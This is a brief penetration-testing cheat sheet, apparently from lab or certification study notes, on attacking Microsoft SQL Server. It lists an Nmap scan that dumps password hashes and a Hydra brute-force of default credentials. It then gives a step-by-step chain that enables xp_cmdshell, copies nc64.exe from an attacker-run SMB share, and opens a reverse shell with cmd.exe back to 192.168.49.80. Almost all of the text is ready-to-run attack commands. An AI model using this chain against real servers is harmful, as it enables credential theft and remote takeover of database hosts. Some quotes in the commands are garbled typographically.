MSSQL Services

mssql-vulnerability – Nmap can be leveraged to scan MsSQL for Known vulnerabilities.

Example Syntax:

nmap -vv -sV -Pn -p [PORT] –script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes –script-args=mssql.instance-port=%s,smsql.username-sa,mssql.password-sa [IP]

mssql-default – Hydra can be utilized to check the MsSQL database for default credentials.

Example Syntax:

hydra -s [PORT] -C ./wordlists/mssql-default-userpass.txt -u -f [IP] mssql

Using MSSQL xp_cmdshell to get reverse shell

EXEC sp_configure ‘show advanced options’, 1;

Reconfigure;

EXEC sp_configure ‘xp_cmdshell’,1

Reconfigure;

SQL>

SQL> xp_cmdshell “whoami”

output

——————————————————————————–

nt service\mssql$sqlexpress

NULL

Start smb share

Sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py tools .

xp_cmdshell  “copy \\192.168.49.80\tools\nc64.exe c:\temp”

SQL> xp_cmdshell “c:\temp\nc64.exe 192.168.49.80 80 -e cmd.exe”